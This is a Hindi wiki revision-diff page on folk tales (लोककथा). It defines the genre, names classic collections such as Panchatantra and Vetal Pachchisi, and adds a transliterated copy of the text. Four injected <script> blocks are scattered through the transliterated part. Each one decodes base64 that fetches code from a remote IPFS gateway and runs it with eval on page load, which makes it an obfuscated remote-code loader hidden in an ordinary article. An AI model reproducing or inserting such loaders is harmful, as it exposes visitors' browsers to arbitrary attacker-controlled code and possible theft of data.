Difference between revisions of "लोककथा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Lok-kathayen.png|thumb]]
 
[[चित्र:Lok-kathayen.png|thumb]]
'''लोककथा''' से तात्पर्य किसी क्षेत्र विशेष में जनश्रुतियों के माध्यम से चली आ रही कथाएं हैं। इनका अस्तित्व पुरानी पीढ़ी से नयी पीढ़ी तक [[किंवदंती]] जनश्रुतियों के माध्यम से ही पहुंचता है। ये कथाएँ वे कहानियाँ हैं जो मनुष्य की कथा प्रवृत्ति के साथ चलकर विभिन्न परिवर्तनों एवं परिवर्धनों के साथ वर्तमान रूप में प्राप्त होती हैं। महत्वपूर्ण बात यह है कि कुछ निश्चित कथानक रूढ़ियों और शैलियों में ढली लोककथाओं के अनेक संस्करण, उसके नित्य नई प्रवृत्तियों और चरितों से युक्त होकर विकसित होने के प्रमाण है। एक ही कथा विभिन्न संदर्भों और अंचलों में बदलकर अनेक रूप ग्रहण करती हैं। [[लोकगीत|लोकगीतों]] की भाँति लोककथाएँ भी हमें मानव की परंपरागत वसीयत के रूप में प्राप्त हैं। दादी अथवा नानी के पास बैठकर बचपन में जो कहानियाँ सुनी जाती है, चौपालों में इनका निर्माण कब, कहाँ कैसे और किसके द्वारा हुआ, यह बताना असंभव है।
+
'''लोककथा''' से तात्पर्य किसी क्षेत्र विशेष में जनश्रुतियों के माध्यम से चली आ रही कथाएं हैं। इनका अस्तित्व पुरानी पीढ़ी से नयी पीढ़ी तक [[किंवदंती]] जनश्रुतियों के माध्यम से ही पहुंचता है। ये कथाएँ वे कहानियाँ हैं जो मनुष्य की [[कथा]] प्रवृत्ति के साथ चलकर विभिन्न परिवर्तनों एवं परिवर्धनों के साथ वर्तमान रूप में प्राप्त होती हैं। महत्वपूर्ण बात यह है कि कुछ निश्चित कथानक रूढ़ियों और शैलियों में ढली लोककथाओं के अनेक संस्करण, उसके नित्य नई प्रवृत्तियों और चरितों से युक्त होकर विकसित होने के प्रमाण है। एक ही कथा विभिन्न संदर्भों और अंचलों में बदलकर अनेक रूप ग्रहण करती हैं। [[लोकगीत|लोकगीतों]] की भाँति लोककथाएँ भी हमें मानव की परंपरागत वसीयत के रूप में प्राप्त हैं। दादी अथवा नानी के पास बैठकर बचपन में जो कहानियाँ सुनी जाती है, चौपालों में इनका निर्माण कब, कहाँ कैसे और किसके द्वारा हुआ, यह बताना असंभव है।
 
;उदाहरणार्थ [[सिंहासन बत्तीसी]], [[वेताल पच्चीसी]], [[पंचतंत्र]]
 
;उदाहरणार्थ [[सिंहासन बत्तीसी]], [[वेताल पच्चीसी]], [[पंचतंत्र]]
 
{{भारतकोश में संकलित लोककथाऐं}}
 
{{भारतकोश में संकलित लोककथाऐं}}
 
{{seealso|लोककथा संग्रहालय}} {{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{seealso|लोककथा संग्रहालय}} {{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 +
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Revision as of 13:49, 27 July 2014

thumb lokakatha se tatpary kisi kshetr vishesh mean janashrutiyoan ke madhyam se chali a rahi kathaean haian. inaka astitv purani pidhi se nayi pidhi tak kianvadanti janashrutiyoan ke madhyam se hi pahuanchata hai. ye kathaean ve kahaniyaan haian jo manushy ki katha pravritti ke sath chalakar vibhinn parivartanoan evan parivardhanoan ke sath vartaman roop mean prapt hoti haian. mahatvapoorn bat yah hai ki kuchh nishchit kathanak roodhiyoan aur shailiyoan mean dhali lokakathaoan ke anek sanskaran, usake nity nee pravrittiyoan aur charitoan se yukt hokar vikasit hone ke praman hai. ek hi katha vibhinn sandarbhoan aur aanchaloan mean badalakar anek roop grahan karati haian. lokagitoan ki bhaanti lokakathaean bhi hamean manav ki paranparagat vasiyat ke roop mean prapt haian. dadi athava nani ke pas baithakar bachapan mean jo kahaniyaan suni jati hai, chaupaloan mean inaka nirman kab, kahaan kaise aur kisake dvara hua, yah batana asanbhav hai.

udaharanarth sianhasan battisi, vetal pachchisi, panchatantr
bharatakosh mean sankalit lokakathaaian
jharakhand ki lokakatha almo da ki lokakatha ashok ki lokakatha lakshmi mata ki lokakatha sianhasan battisi
tamilanadu ki lokakatha-1 rajasthan ki lokakatha buddhi ki lokakatha piangala ki lokakatha vetal pachchisi
panjab ki lokakatha kanbuj ki lokakatha loh di ki lokakatha chaturaee ki lokakatha panchatantr
  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>